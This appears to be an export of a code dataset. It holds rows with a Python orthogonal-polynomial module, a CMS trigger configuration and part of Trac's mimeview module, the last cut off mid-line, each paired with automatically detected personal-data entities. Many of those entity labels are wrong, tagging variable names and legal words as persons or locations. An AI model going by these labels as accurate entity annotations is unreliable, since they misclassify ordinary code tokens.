Inputs: + N - polynomial order + a - weight parameter + b - weight parameter + + Outputs: + alpha - recursion coefficients + beta - recursion coefficients + + Adapted from the MATLAB code by Dirk Laurie and Walter Gautschi + http://www.cs.purdue.edu/archives/2002/wxg/codes/r_jacobi.m + """""" + + nu = (b - a) / float(a + b + 2) + mu = 2 ** (a + b + 1) * gamma(a + 1) * gamma(b + 1) / gamma(a + b + 2) + + if N == 1: + alpha = nu + beta = mu + else: + n = np.arange(1.0, N) + nab = 2 * n + a + b + alpha = np.hstack((nu, (b ** 2 - a ** 2) / (nab * (nab + 2)))) + n = n[1:] + nab = nab[1:] + B1 = 4 * (a + 1) * (b + 1) / float((a + b + 2) ** 2 * (a + b + 3)) + B = 4 * (n + a) * (n + b) * n * (n + a + b) / \ + (nab ** 2 * (nab + 1) * (nab - 1)) + beta = np.hstack((mu, B1, B)) + + return alpha, beta + + +def rec_jacobi01(N, a, b): + """""" + Generate the recursion coefficients alpha_k, beta_k + for the Jacobi polynomials which are orthogonal on [0,1] + + See rec_jacobi for the recursion coefficients on [-1,1] + + Inputs: + N - polynomial order + a - weight parameter + b - weight parameter + + Outputs: + alpha - recursion coefficients + beta - recursion coefficients + + Adapted from the MATLAB implementation: + https://www.cs.purdue.edu/archives/2002/wxg/codes/r_jacobi01.m + + """""" + + if a <= -1 or b <= -1: + raise ValueError('''Jacobi coefficients are defined only + for alpha,beta > -1''') + + if not isinstance(N, int): + raise TypeError('N must be an integer') + + if N < 1: + raise ValueError('N must be at least 1') + + c, d = rec_jacobi(N, a, b) + + alpha = (1 + c) / 2 + beta = d / 4 + beta[0] = d[0] / 2 ** (a + b + 1) + + return alpha, beta + + +def polyval(alpha, beta, x): + """""" + Evaluate polynomials on x given the recursion coefficients alpha and beta + """""" + + N = len(alpha) + m = len(x) + P = np.zeros((m, N + 1)) + + P[:, 0] = 1 + P[:, 1] = (x - alpha[0]) * P[:, 0] + + for k in range(1, N): + P[:, k + 1] = (x - alpha[k]) * P[:, k] - beta[k] * P[:, k - 1] + + return P + + +def jacobi(N, a, b, x, NOPT=1): + """""" + JACOBI computes the Jacobi polynomials which are orthogonal on [-1,1] + with respect to the weight w(x)=[(1-x)^a]*[(1+x)^b] and evaluate them + on the given grid up to P_N(x). Setting NOPT=2 returns the + L2-normalized polynomials + """""" + + m = len(x) + P = np.zeros((m, N + 1)) + + apb = a + b + a1 = a - 1 + b1 = b - 1 + c = apb * (a - b) + + P[:, 0] = 1 + + if N > 0: + P[:, 1] = 0.5 * (a - b + (apb + 2) * x) + + if N > 1: + for k in range(2, N + 1): + k2 = 2 * k + g = k2 + apb + g1 = g - 1 + g2 = g - 2 + d = 2.0 * (k + a1) * (k + b1) * g + P[:, k] = (g1 * (c + g2 * g * x) * P[:, k - 1] - + d * P[:, k - 2]) / (k2 * (k + apb) * g2) + + if NOPT == 2: + k = np.arange(N + 1) + pnorm = 2 ** (apb + 1) * gamma(k + a + 1) * gamma(k + b + 1) / \ + ((2 * k + a + b + 1) * (gamma(k + 1) * gamma(k + a + b + 1))) + P *= 1 / np.sqrt(pnorm) + return P + + +def jacobiD(N, a, b, x, NOPT=1): + """""" + JACOBID computes the first derivatives of the normalized Jacobi + polynomials which are orthogonal on [-1,1] with respect + to the weight w(x)=[(1-x)^a]*[(1+x)^b] and evaluate them + on the given grid up to P_N(x). Setting NOPT=2 returns + the derivatives of the L2-normalized polynomials + """""" + + z = np.zeros((len(x), 1)) + if N == 0: + Px = z + else: + + Px = 0.5 * np.hstack((z, jacobi(N - 1, a + 1, b + 1, x, NOPT) * + ((a + b + 2 + np.arange(N))))) + return Px + + +def mm_log(N, a): + """""" + MM_LOG Modified moments for a logarithmic weight function. + + The call mm=MM_LOG(n,a) computes the first n modified moments of the + logarithmic weight function w(t)=t^a log(1/t) on [0,1] relative to + shifted Legendre polynomials. + + REFERENCE: Walter Gautschi,``On the preceding paper `A Legendre + polynomial integral' by James L. Blue'', + Math. Comp. 33 (1979), 742-743. + + Adapted from the MATLAB implementation: + https://www.cs.purdue.edu/archives/2002/wxg/codes/mm_log.m + """""" + + if a <= -1: + raise ValueError('Parameter a must be greater than -1') + + prod = lambda z: reduce(lambda x, y: x * y, z, 1) + + mm = np.zeros(N) + + c = 1 + for n in range(N): + if isinstance(a, int) and a < n: + + p = range(n - a, n + a + 2) + mm[n] = (-1) ** (n - a) / prod(p) + mm[n] *= gamma(a + 1) ** 2 + + else: + if n == 0: + mm[0] = 1 / (a + 1) ** 2 + else: + k = np.arange(1, n + 1) + s = 1 / (a + 1 + k) - 1 / (a + 1 - k) + p = (a + 1 - k) / (a + 1 + k) + mm[n] = (1 / (a + 1) + sum(s)) * prod(p) / (a + 1) + + mm[n] *= c + c *= 0.5 * (n + 1) / (2 * n + 1) + + return mm + + +def mod_chebyshev(N, mom, alpham, betam): + """""" + Calcuate the recursion coefficients for the orthogonal polynomials + which are are orthogonal with respect to a weight function which is + represented in terms of its modifed moments which are obtained by + integrating the monic polynomials against the weight function. + + References + ---------- + + John C. Wheeler, ""Modified moments and Gaussian quadratures"" + Rocky Mountain Journal of Mathematics, Vol. 4, Num. 2 (1974), 287--296 + + Walter Gautschi, ""Orthogonal Polynomials (in Matlab) + Journal of Computational and Applied Mathematics, Vol. 178 (2005) 215--234 + + Adapted from the MATLAB implementation: + https://www.cs.purdue.edu/archives/2002/wxg/codes/chebyshev.m + + """""" + + if not isinstance(N, int): + raise TypeError('N must be an integer') + + if N < 1: + raise ValueError('N must be at least 1') + + N = min(N, int(len(mom) / 2)) + + alpha = np.zeros(N) + beta = np.zeros(N) + normsq = np.zeros(N) + sig = np.zeros((N + 1, 2 * N)) + + alpha[0] = alpham[0] + mom[1] / mom[0] + beta[0] = mom[0] + + sig[1, :] = mom + + for n in range(2, N + 1): + for m in range(n - 1, 2 * N - n + 1): + sig[n, m] = sig[n - 1, m + 1] - (alpha[n - 2] - alpham[m]) * sig[n - 1, m] - \ + beta[n - 2] * sig[n - 2, m] + betam[m] * sig[n - 1, m - 1] + + alpha[n - 1] = alpham[n - 1] + sig[n, n] / sig[n, n - 1] - sig[n - 1, n - 1] / \ + sig[n - 1, n - 2] + beta[n - 1] = sig[n, n - 1] / sig[n - 1, n - 2] + + normsq = np.diagonal(sig, -1) + + return alpha, beta, normsq + + +def rec_jaclog(N, a): + """""" + Generate the recursion coefficients alpha_k, beta_k + + P_{k+1}(x) = (x-alpha_k)*P_{k}(x) - beta_k P_{k-1}(x) + + for the monic polynomials which are orthogonal on [0,1] + with respect to the weight w(x)=x^a*log(1/x) + + Inputs: + N - polynomial order + a - weight parameter + + Outputs: + alpha - recursion coefficients + beta - recursion coefficients + + Adated from the MATLAB code: + https://www.cs.purdue.edu/archives/2002/wxg/codes/r_jaclog.m + """""" + alphaj, betaj = rec_jacobi01(2 * N, 0, 0) + mom = mm_log(2 * N, a) + alpha, beta, _ = mod_chebyshev(N, mom, alphaj, betaj) + return alpha, beta +",10886,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['DATE_TIME', '2014'], ['PERSON', 'Greg von Winckel'], ['LOCATION', 'DAMAGES'], ['PERSON', 'WHETHER'], ['DATE_TIME', 'Wed Jan 1'], ['DATE_TIME', '2014'], ['PERSON', 'David A. Ham'], ['DATE_TIME', '2016'], ['PERSON', 'Walter Gautschi\n '], ['PERSON', 'Gene Golub'], ['DATE_TIME', 'April 1973'], ['LOCATION', 'P_{k+1}(x'], ['PERSON', 'Dirk Laurie'], ['PERSON', 'Walter Gautschi\n '], ['LOCATION', ""ValueError('N""], ['PERSON', 'NOPT'], ['PERSON', 'Px'], ['PERSON', 'Px'], ['PERSON', 'NOPT'], ['PERSON', 'Walter Gautschi,``On'], ['PERSON', ""James L. Blue''""], ['DATE_TIME', '33 (1979'], ['LOCATION', 'mm[0'], ['LOCATION', 'alpham'], ['PERSON', 'betam'], ['PERSON', 'John C. Wheeler'], ['NRP', 'Gaussian'], ['DATE_TIME', '1974'], ['PERSON', 'Walter Gautschi'], ['DATE_TIME', '2005'], ['LOCATION', ""ValueError('N""], ['DATE_TIME', 'min(N'], ['LOCATION', 'rec_jaclog(N'], ['LOCATION', 'P_{k+1}(x'], ['URL', 'http://www.cs.purdue.edu/archives/2002/wxg/codes/gauss.m'], ['URL', 'http://www.cs.purdue.edu/archives/2002/wxg/codes/r_jacobi.m'], ['URL', 'https://www.cs.purdue.edu/archives/2002/wxg/codes/r_jacobi01.m'], ['URL', 'https://www.cs.purdue.edu/archives/2002/wxg/codes/mm_log.m'], ['URL', 'https://www.cs.purdue.edu/archives/2002/wxg/codes/chebyshev.m'], ['URL', 'https://www.cs.purdue.edu/archives/2002/wxg/codes/r_jaclog.m'], ['URL', 'orthopoly.py'], ['URL', 'email.com'], ['URL', 'numpy.li'], ['URL', 'np.re'], ['URL', 'numpy.li'], ['URL', 'np.ar'], ['URL', 'np.ar'], ['URL', 'np.ar'], ['URL', 'np.ar'], ['URL', 'np.ar'], ['URL', 'np.ar']]" +6,"## @package TriggerObjectBlock_cfi +# Configuration file that defines the producer of ROOT-tuple for trigger objects. +# +# \author Subir Sarkar +# \author Rosamaria Venditti (INFN Bari, Bari University) +# \author Konstantin Androsov (University of Siena, INFN Pisa) +# \author Maria Teresa Grippo (University of Siena, INFN Pisa) +# +# Copyright 2011-2013 Subir Sarkar, Rosamaria Venditti (INFN Bari, Bari University) +# Copyright 2014 Konstantin Androsov dummy@email.com, +# Maria Teresa Grippo dummy@email.com +# +# This file is part of X->HH->bbTauTau. +# +# X->HH->bbTauTau is free software: you can redistribute it and/or modify +# it under the terms of the GNU General Public License as published by +# the Free Software Foundation, either version 2 of the License, or +# (at your option) any later version. +# +# X->HH->bbTauTau is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with X->HH->bbTauTau. If not, see . + +import FWCore.ParameterSet.Config as cms + +triggerObjectBlock = cms.EDAnalyzer(""TriggerObjectBlock"", + verbosity = cms.int32(0), + hltInputTag = cms.InputTag('TriggerResults','','HLT'), + triggerEventTag = cms.InputTag('patTriggerEvent'), + hltPathsOfInterest = cms.vstring (""HLT_DoubleMu"", + ""HLT_Mu"", + ""HLT_IsoMu"", + ""HLT_TripleMu"", + ""IsoPFTau"", + ""TrkIsoT"", + ""HLT_Ele""), + May10ReRecoData = cms.bool(False) +) +",1844,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['PERSON', 'Subir Sarkar'], ['PERSON', 'Rosamaria Venditti'], ['PERSON', 'Konstantin Androsov'], ['PERSON', 'Maria Teresa Grippo'], ['DATE_TIME', '2011-2013'], ['PERSON', 'Subir Sarkar'], ['PERSON', 'Rosamaria Venditti'], ['DATE_TIME', '2014'], ['PERSON', 'Konstantin Androsov'], ['PERSON', 'Maria Teresa Grippo'], ['PERSON', 'triggerEventTag = cms'], ['PERSON', ""InputTag('patTriggerEvent""], ['URL', 'http://www.gnu.org/licenses/'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'FWCore.ParameterSet.Co'], ['URL', 'cms.int'], ['URL', 'cms.In'], ['URL', 'cms.In'], ['URL', 'cms.bo']]" +7,"# -*- coding: utf-8 -*- +# +# Copyright (C) 2004-2010 Edgewall Software +# Copyright (C) 2004 Daniel Lundin dummy@email.com +# Copyright (C) 2005-2006 Christopher Lenz dummy@email.com +# Copyright (C) 2006-2007 Christian Boos dummy@email.com +# All rights reserved. +# +# This software is licensed as described in the file COPYING, which +# you should have received as part of this distribution. The terms +# are also available at http://trac.edgewall.org/wiki/TracLicense. +# +# This software consists of voluntary contributions made by many +# individuals. For the exact contribution history, see the revision +# history and logs, available at http://trac.edgewall.org/log/. +# +# Author: Daniel Lundin dummy@email.com +# Christopher Lenz dummy@email.com +# Christian Boos dummy@email.com + +"""""" +File metadata management +------------------------ + +The `trac.mimeview` package centralizes the intelligence related to +file metadata, principally concerning the `type` (MIME type) of the +content and, if relevant, concerning the text encoding (charset) used +by the content. + +There are primarily two approaches for getting the MIME type of a +given file, either taking advantage of existing conventions for the +file name, or examining the file content and applying various +heuristics. + +The module also knows how to convert the file content from one type to +another type. + +In some cases, only the `url` pointing to the file's content is +actually needed, that's why we avoid to read the file's content when +it's not needed. + +The actual `content` to be converted might be a `unicode` object, but +it can also be the raw byte string (`str`) object, or simply an object +that can be `read()`. + +.. note:: (for plugin developers) + + The Mimeview API is quite complex and many things there are + currently a bit difficult to work with (e.g. what an actual + `content` might be, see the last paragraph of this description). + + So this area is mainly in a ''work in progress'' state, which will + be improved along the lines described in :teo:`#3332`. + + In particular, if you are interested in writing `IContentConverter` + and `IHTMLPreviewRenderer` components, note that those interfaces + will be merged into a new style `IContentConverter`. Feel free to + contribute remarks and suggestions for improvements to the + corresponding ticket (#3332 as well). +"""""" + +import re +from StringIO import StringIO + +from genshi import Markup, Stream +from genshi.core import TEXT, START, END, START_NS, END_NS +from genshi.builder import Fragment, tag +from genshi.input import HTMLParser + +from trac.config import IntOption, ListOption, Option +from trac.core import * +from trac.resource import Resource +from trac.util import Ranges, content_disposition +from trac.util.text import exception_to_unicode, to_utf8, to_unicode +from trac.util.translation import _, tag_ + + +__all__ = ['Context', 'Mimeview', 'RenderingContext', 'get_mimetype', + 'is_binary', 'detect_unicode', 'content_to_unicode', 'ct_mimetype'] + +class RenderingContext(object): + """""" + A rendering context specifies ''how'' the content should be rendered. + + It holds together all the needed contextual information that will be + needed by individual renderer components. + + To that end, a context keeps track of the Href instance (`.href`) which + should be used as a base for building URLs. + + It also provides a `PermissionCache` (`.perm`) which can be used to + restrict the output so that only the authorized information is shown. + + A rendering context may also be associated to some Trac resource which + will be used as the implicit reference when rendering relative links + or for retrieving relative content and can be used to retrieve related + metadata. + + Rendering contexts can be nested, and a new context can be created from + an existing context using the call syntax. The previous context can be + retrieved using the `.parent` attribute. + + For example, when rendering a wiki text of a wiki page, the context will + be associated to a resource identifying that wiki page. + + If that wiki text contains a `[[TicketQuery]]` wiki macro, the macro will + set up nested contexts for each matching ticket that will be used for + rendering the ticket descriptions. + + :since: version 0.11 + """""" + + def __init__(self, resource, href=None, perm=None): + """"""Directly create a `RenderingContext`. + + :param resource: the associated resource + :type resource: `Resource` + :param href: an `Href` object suitable for creating URLs + :param perm: a `PermissionCache` object used for restricting the + generated output to ""authorized"" information only. + + The actual `.perm` attribute of the rendering context will be bound + to the given `resource` so that fine-grained permission checks will + apply to that. + """""" + self.parent = None #: The parent context, if any + self.resource = resource + self.href = href + self.perm = perm(resource) if perm and resource else perm + self._hints = None + + @staticmethod + def from_request(*args, **kwargs): + """""":deprecated: since 1.0, use `web_context` instead."""""" + from trac.web.chrome import web_context + return web_context(*args, **kwargs) + + def __repr__(self): + path = [] + context = self + while context: + if context.resource.realm: # skip toplevel resource + path.append(repr(context.resource)) + context = context.parent + return '<%s %s>' % (type(self).__name__, ' - '.join(reversed(path))) + + def child(self, resource=None, id=False, version=False, parent=False): + """"""Create a nested rendering context. + + `self` will be the parent for the new nested context. + + :param resource: either a `Resource` object or the realm string for a + resource specification to be associated to the new + context. If `None`, the resource will be the same + as the resource of the parent context. + :param id: the identifier part of the resource specification + :param version: the version of the resource specification + :return: the new context object + :rtype: `RenderingContext` + + >>> context = RenderingContext('wiki', 'WikiStart') + >>> ticket1 = Resource('ticket', 1) + >>> context.child('ticket', 1).resource == ticket1 + True + >>> context.child(ticket1).resource is ticket1 + True + >>> context.child(ticket1)().resource is ticket1 + True + """""" + if resource: + resource = Resource(resource, id=id, version=version, + parent=parent) + else: + resource = self.resource + context = RenderingContext(resource, href=self.href, perm=self.perm) + context.parent = self + + # hack for context instances created by from_request() + # this is needed because various parts of the code rely on a request + # object being available, but that will hopefully improve in the + # future + if hasattr(self, 'req'): + context.req = self.req + + return context + + __call__ = child + + def __contains__(self, resource): + """"""Check whether a resource is in the rendering path. + + The primary use for this check is to avoid to render the content of a + resource if we're already embedded in a context associated to that + resource. + + :param resource: a `Resource` specification which will be checked for + """""" + context = self + while context: + if context.resource and \ + context.resource.realm == resource.realm and \ + context.resource.id == resource.id: + # we don't care about version here + return True + context = context.parent + + # Rendering hints + # + # A rendering hint is a key/value pairs that can influence renderers, + # wiki formatters and processors in the way they produce their output. + # The keys are strings, but the values could be anything. + # + # In nested contexts, the hints are inherited from their parent context, + # unless overriden locally. + + def set_hints(self, **keyvalues): + """"""Set rendering hints for this rendering context. + + >>> ctx = RenderingContext('timeline') + >>> ctx.set_hints(wiki_flavor='oneliner', shorten_lines=True) + >>> t_ctx = ctx('ticket', 1) + >>> t_ctx.set_hints(wiki_flavor='html', preserve_newlines=True) + >>> (t_ctx.get_hint('wiki_flavor'), t_ctx.get_hint('shorten_lines'), \ + t_ctx.get_hint('preserve_newlines')) + ('html', True, True) + >>> (ctx.get_hint('wiki_flavor'), ctx.get_hint('shorten_lines'), \ + ctx.get_hint('preserve_newlines')) + ('oneliner', True, None) + """""" + if self._hints is None: + self._hints = {} + hints = self._parent_hints() + if hints is not None: + self._hints.update(hints) + self._hints.update(keyvalues) + + def get_hint(self, hint, default=None): + """"""Retrieve a rendering hint from this context or an ancestor context. + + >>> ctx = RenderingContext('timeline') + >>> ctx.set_hints(wiki_flavor='oneliner') + >>> t_ctx = ctx('ticket', 1) + >>> t_ctx.get_hint('wiki_flavor') + 'oneliner' + >>> t_ctx.get_hint('preserve_newlines', True) + True + """""" + hints = self._hints + if hints is None: + hints = self._parent_hints() + if hints is None: + return default + return hints.get(hint, default) + + def has_hint(self, hint): + """"""Test whether a rendering hint is defined in this context or in some + ancestor context. + + >>> ctx = RenderingContext('timeline') + >>> ctx.set_hints(wiki_flavor='oneliner') + >>> t_ctx = ctx('ticket', 1) + >>> t_ctx.has_hint('wiki_flavor') + True + >>> t_ctx.has_hint('preserve_newlines') + False + """""" + hints = self._hints + if hints is None: + hints = self._parent_hints() + if hints is None: + return False + return hint in hints + + def _parent_hints(self): + p = self.parent + while p and p._hints is None: + p = p.parent + return p and p._hints + + +class Context(RenderingContext): + """""":deprecated: old name kept for compatibility, use `RenderingContext`."""""" + + +# Some common MIME types and their associated keywords and/or file extensions + +KNOWN_MIME_TYPES = { + 'application/javascript': 'js', + 'application/msword': 'doc dot', + 'application/pdf': 'pdf', + 'application/postscript': 'ps', + 'application/rtf': 'rtf', + 'application/x-sh': 'sh', + 'application/x-csh': 'csh', + 'application/x-troff': 'nroff roff troff', + 'application/x-yaml': 'yml yaml', + + 'application/rss+xml': 'rss', + 'application/xsl+xml': 'xsl', + 'application/xslt+xml': 'xslt', + + 'image/x-icon': 'ico', + 'image/svg+xml': 'svg', + + 'model/vrml': 'vrml wrl', + + 'text/css': 'css', + 'text/html': 'html htm', + 'text/plain': 'txt TXT text README INSTALL ' + 'AUTHORS COPYING ChangeLog RELEASE', + 'text/xml': 'xml', + + # see also TEXT_X_TYPES below + 'text/x-csrc': 'c xs', + 'text/x-chdr': 'h', + 'text/x-c++src': 'cc CC cpp C c++ C++', + 'text/x-c++hdr': 'hh HH hpp H', + 'text/x-csharp': 'cs c# C#', + 'text/x-diff': 'patch', + 'text/x-eiffel': 'e', + 'text/x-elisp': 'el', + 'text/x-fortran': 'f', + 'text/x-haskell': 'hs', + 'text/x-ini': 'ini cfg', + 'text/x-objc': 'm mm', + 'text/x-ocaml': 'ml mli', + 'text/x-makefile': 'make mk Makefile GNUMakefile', + 'text/x-pascal': 'pas', + 'text/x-perl': 'pl pm PL', + 'text/x-php': 'php3 php4', + 'text/x-python': 'py', + 'text/x-pyrex': 'pyx', + 'text/x-ruby': 'rb', + 'text/x-scheme': 'scm', + 'text/x-textile': 'txtl', + 'text/x-vba': 'vb vba bas', + 'text/x-verilog': 'v', + 'text/x-vhdl': 'vhd', +} +for t in KNOWN_MIME_TYPES.keys(): + types = KNOWN_MIME_TYPES[t].split() + if t.startswith('text/x-'): + types.append(t[len('text/x-'):]) + KNOWN_MIME_TYPES[t] = types + +# extend the above with simple (text/x-: ) mappings + +TEXT_X_TYPES = """""" + ada asm asp awk idl inf java ksh lua m4 mail psp rfc rst sql tcl tex zsh +"""""" +for x in TEXT_X_TYPES.split(): + KNOWN_MIME_TYPES.setdefault('text/x-%s' % x, []).append(x) + + +# Default mapping from keywords/extensions to known MIME types: + +MIME_MAP = {} +for t, exts in KNOWN_MIME_TYPES.items(): + MIME_MAP[t] = t + for e in exts: + MIME_MAP[e] = t + +# Simple builtin autodetection from the content using a regexp +MODE_RE = re.compile(r"""""" + \#!.+?env\s+(\w+) # 1. look for shebang with env + | \#!(?:[/\w.-_]+/)?(\w+) # 2. look for regular shebang + | -\*-\s*(?:mode:\s*)?([\w+-]+)\s*-\*- # 3. look for Emacs' -*- mode -*- + | vim:.*?(?:syntax|filetype|ft)=(\w+) # 4. look for VIM's syntax= + """""", re.VERBOSE) + +def get_mimetype(filename, content=None, mime_map=MIME_MAP): + """"""Guess the most probable MIME type of a file with the given name. + + `filename` is either a filename (the lookup will then use the suffix) + or some arbitrary keyword. + + `content` is either a `str` or an `unicode` string. + """""" + suffix = filename.split('.')[-1] + if suffix in mime_map: + # 1) mimetype from the suffix, using the `mime_map` + return mime_map[suffix] + else: + mimetype = None + try: + import mimetypes + # 2) mimetype from the suffix, using the `mimetypes` module + mimetype = mimetypes.guess_type(filename)[0] + except Exception: + pass + if not mimetype and content: + match = re.search(MODE_RE, content[:1000] + content[-1000:]) + if match: + mode = match.group(1) or match.group(2) or match.group(4) or \ + match.group(3).lower() + if mode in mime_map: + # 3) mimetype from the content, using the `MODE_RE` + return mime_map[mode] + else: + if is_binary(content): + # 4) mimetype from the content, using`is_binary` + return 'application/octet-stream' + return mimetype + +def ct_mimetype(content_type): + """"""Return the mimetype part of a content type."""""" + return (content_type or '').split(';')[0].strip() + +def is_binary(data): + """"""Detect binary content by checking the first thousand bytes for zeroes. + + Operate on either `str` or `unicode` strings. + """""" + if isinstance(data, str) and detect_unicode(data): + return False + return '\0' in data[:1000] + +def detect_unicode(data): + """"""Detect different unicode charsets by looking for BOMs (Byte Order Mark). + + Operate obviously only on `str` objects. + """""" + if data.startswith('\xff\xfe'): + return 'utf-16-le' + elif data.startswith('\xfe\xff'): + return 'utf-16-be' + elif data.startswith('\xef\xbb\xbf'): + return 'utf-8' + else: + return None + +def content_to_unicode(env, content, mimetype): + """"""Retrieve an `unicode` object from a `content` to be previewed. + + In case the raw content had an unicode BOM, we remove it. + + >>> from trac.test import EnvironmentStub + >>> env = EnvironmentStub() + >>> content_to_unicode(env, u""\ufeffNo BOM! h\u00e9 !"", '') + u'No BOM! h\\xe9 !' + >>> content_to_unicode(env, ""\xef\xbb\xbfNo BOM! h\xc3\xa9 !"", '') + u'No BOM! h\\xe9 !' + + """""" + mimeview = Mimeview(env) + if hasattr(content, 'read'): + content = content.read(mimeview.max_preview_size) + u = mimeview.to_unicode(content, mimetype) + if u and u[0] == u'\ufeff': + u = u[1:] + return u + + +class IHTMLPreviewRenderer(Interface): + """"""Extension point interface for components that add HTML renderers of + specific content types to the `Mimeview` component. + + .. note:: + + This interface will be merged with IContentConverter, as + conversion to text/html will simply be a particular content + conversion. + + Note however that the IHTMLPreviewRenderer will still be + supported for a while through an adapter, whereas the + IContentConverter interface itself will be changed. + + So if all you want to do is convert to HTML and don't feel like + following the API changes, you should rather implement this + interface for the time being. + """""" + + #: implementing classes should set this property to True if they + #: support text content where Trac should expand tabs into spaces + expand_tabs = False + + #: indicate whether the output of this renderer is source code that can + #: be decorated with annotations + returns_source = False + + def get_quality_ratio(mimetype): + """"""Return the level of support this renderer provides for the `content` + of the specified MIME type. The return value must be a number between + 0 and 9, where 0 means no support and 9 means ""perfect"" support. + """""" + + def render(context, mimetype, content, filename=None, url=None): + """"""Render an XHTML preview of the raw `content` in a RenderingContext. + + The `content` might be: + * a `str` object + * an `unicode` string + * any object with a `read` method, returning one of the above + + It is assumed that the content will correspond to the given `mimetype`. + + Besides the `content` value, the same content may eventually + be available through the `filename` or `url` parameters. + This is useful for renderers that embed objects, using or + instead of including the content inline. + + Can return the generated XHTML text as a single string or as an + iterable that yields strings. In the latter case, the list will + be considered to correspond to lines of text in the original content. + """""" + + +class IHTMLPreviewAnnotator(Interface): + """"""Extension point interface for components that can annotate an XHTML + representation of file contents with additional information."""""" + + def get_annotation_type(): + """"""Return a (type, label, description) tuple + that defines the type of annotation and provides human readable names. + The `type` element should be unique to the annotator. + The `label` element is used as column heading for the table, + while `description` is used as a display name to let the user + toggle the appearance of the annotation type. + """""" + + def get_annotation_data(context): + """"""Return some metadata to be used by the `annotate_row` method below. + + This will be called only once, before lines are processed. + If this raises an error, that annotator won't be used. + """""" + + def annotate_row(context, row, number, line, data): + """"""Return the XHTML markup for the table cell that contains the + annotation data. + + `context` is the context corresponding to the content being annotated, + `row` is the tr Element being built, `number` is the line number being + processed and `line` is the line's actual content. + `data` is whatever additional data the `get_annotation_data` method + decided to provide. + """""" + + +class IContentConverter(Interface): + """"""An extension point interface for generic MIME based content + conversion. + + .. note:: This api will likely change in the future (see :teo:`#3332`) + + """""" + + def get_supported_conversions(): + """"""Return an iterable of tuples in the form (key, name, extension, + in_mimetype, out_mimetype, quality) representing the MIME conversions + supported and + the quality ratio of the conversion in the range 0 to 9, where 0 means + no support and 9 means ""perfect"" support. eg. ('latex', 'LaTeX', 'tex', + 'text/x-trac-wiki', 'text/plain', 8)"""""" + + def convert_content(req, mimetype, content, key): + """"""Convert the given content from mimetype to the output MIME type + represented by key. Returns a tuple in the form (content, + output_mime_type) or None if conversion is not possible."""""" + + +class Content(object): + """"""A lazy file-like object that only reads `input` if necessary."""""" + def __init__(self, input, max_size): + self.input = input + self.max_size = max_size + self.content = None + + def read(self, size=-1): + if size == 0: + return '' + if self.content is None: + self.content = StringIO(self.input.read(self.max_size)) + return self.content.read(size) + + def reset(self): + if self.content is not None: + self.content.seek(0) + + +class Mimeview(Component): + """"""Generic HTML renderer for data, typically source code."""""" + + required = True + + renderers = ExtensionPoint(IHTMLPreviewRenderer) + annotators = ExtensionPoint(IHTMLPreviewAnnotator) + converters = ExtensionPoint(IContentConverter) + + default_charset = Option('trac', 'default_charset', 'utf-8', + """"""Charset to be used when in doubt."""""") + + tab_width = IntOption('mimeviewer', 'tab_width', 8, + """"""Displayed tab width in file preview. (''since 0.9'')"""""") + + max_preview_size = IntOption('mimeviewer', 'max_preview_size', 262144, + """"""Maximum file size for HTML preview. (''since 0.9'')"""""") + + mime_map = ListOption('mimeviewer', 'mime_map', + 'text/x-dylan:dylan, text/x-idl:ice, text/x-ada:ads:adb', + doc=""""""List of additional MIME types and keyword mappings. + Mappings are comma-separated, and for each MIME type, + there's a colon ("":"") separated list of associated keywords + or file extensions. (''since 0.10'')"""""") + + treat_as_binary = ListOption('mimeviewer', 'treat_as_binary', + 'application/octet-stream, application/pdf, application/postscript, ' + 'application/msword,application/rtf,', + doc=""""""Comma-separated list of MIME types that should be treated as + binary data. (''since 0.11.5'')"""""") + + def __init__(self): + self._mime_map = None + + # Public API + + def get_supported_conversions(self, mimetype): + """"""Return a list of target MIME types in same form as + `IContentConverter.get_supported_conversions()`, but with the converter + component appended. Output is ordered from best to worst quality."""""" + converters = [] + for converter in self.converters: + conversions = converter.get_supported_conversions() or [] + for k, n, e, im, om, q in conversions: + if im == mimetype and q > 0: + converters.append((k, n, e, im, om, q, converter)) + converters = sorted(converters, key=lambda i: i[-2], reverse=True) + return converters + + def convert_content(self, req, mimetype, content, key, filename=None, + url=None): + """"""Convert the given content to the target MIME type represented by + `key`, which can be either a MIME type or a key. Returns a tuple of + (content, output_mime_type, extension)."""""" + if not content: + return ('', 'text/plain;charset=utf-8', '.txt') + + # Ensure we have a MIME type for this content + full_mimetype = mimetype + if not full_mimetype: + if hasattr(content, 'read'): + content = content.read(self.max_preview_size) + full_mimetype = self.get_mimetype(filename, content) + if full_mimetype: + mimetype = ct_mimetype(full_mimetype) # split off charset + else: + mimetype = full_mimetype = 'text/plain' # fallback if not binary + + # Choose best converter + candidates = list(self.get_supported_conversions(mimetype) or []) + candidates = [c for c in candidates if key in (c[0], c[4])] + if not candidates: + raise TracError( + _(""No available MIME conversions from %(old)s to %(new)s"", + old=mimetype, new=key)) + + # First successful conversion wins + for ck, name, ext, input_mimettype, output_mimetype, quality, \ + converter in candidates: + output = converter.convert_content(req, mimetype, content, ck) + if output: + return (output[0], output[1], ext) + raise TracError( + _(""No available MIME conversions from %(old)s to %(new)s"", + old=mimetype, new=key)) + + def get_annotation_types(self): + """"""Generator that returns all available annotation types."""""" + for annotator in self.annotators: + yield annotator.get_annotation_type() + + def render(self, context, mimetype, content, filename=None, url=None, + annotations=None, force_source=False): + """"""Render an XHTML preview of the given `content`. + + `content` is the same as an `IHTMLPreviewRenderer.render`'s + `content` argument. + + The specified `mimetype` will be used to select the most appropriate + `IHTMLPreviewRenderer` implementation available for this MIME type. + If not given, the MIME type will be infered from the filename or the + content. + + Return a string containing the XHTML text. + + When rendering with an `IHTMLPreviewRenderer` fails, a warning is added + to the request associated with the context (if any), unless the + `disable_warnings` hint is set to `True`. + """""" + if not content: + return '' + if not isinstance(context, RenderingContext): + raise TypeError(""RenderingContext expected (since 0.11)"") + + # Ensure we have a MIME type for this content + full_mimetype = mimetype + if not full_mimetype: + if hasattr(content, 'read'): + content = content.read(self.max_preview_size) + full_mimetype = self.get_mimetype(filename, content) + if full_mimetype: + mimetype = ct_mimetype(full_mimetype) # split off charset + else: + mimetype = full_mimetype = 'text/plain' # fallback if not binary + + # Determine candidate `IHTMLPreviewRenderer`s + candidates = [] + for renderer in self.renderers: + qr = 